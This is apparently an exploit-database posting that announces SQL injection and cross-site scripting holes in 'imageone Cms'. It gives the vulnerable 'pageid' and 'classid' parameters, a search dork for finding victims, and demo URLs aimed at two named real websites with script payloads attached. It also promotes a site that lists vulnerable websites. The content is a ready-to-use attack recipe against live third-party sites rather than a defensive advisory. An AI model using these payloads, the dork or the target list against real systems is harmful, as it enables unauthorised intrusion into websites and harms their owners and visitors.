Sql and Xss vulnerability in imageone Cms All Version ################################# # # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@ # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@ # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@ # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@ # ##################################### Iranian Exploit DataBase TiTle : imageone Cms Multiple vulnerabilities Risk : High Tested on : Linux Vendor site : http://www.image1tech.net/ Dork : intext:"imageone development" Version : All Version Of Cms Author : Amir Home : http://iedb.ir - http://xssed.ir Archive Exploit : http://iedb.ir/exploits.php?id=4582 ##################################### Bug : http://target/index.php?pageid=[sql][xss] http://target/inventory.php?classid=[sql][xss] ##################################### Dem0 : http://www.oerv.com/index.php?pageid=5[xss][sql]'"><script>alert('iedb.ir')</script> http://www.outdoorexpressrv.com/index.php?pageid=6[xss][sql]'"><script>alert('iedb.ir')</script> http://www.oerv.com/inventory.php?classid=16[xss][sql]'"><script>alert('iedb.ir')</script> http://www.outdoorexpressrv.com/inventory.php?classid=16'"><script>alert('iedb.ir')</script> ##################################### Thanks to all the friends and Iranian hackers, and thank all the members http://Iedb.Ir And IrIsT.Ir Team Home : http://iedb.ir - http://xssed.ir - http://iedb.ir/acc http://Xssed.Ir : On this site, all bugs Xss and Sql which sites are placed.Be sure to check the site and sites vulnerable to it. ##################################### Archive Exploit : http://iedb.ir/exploits.php?id=4582 #####################################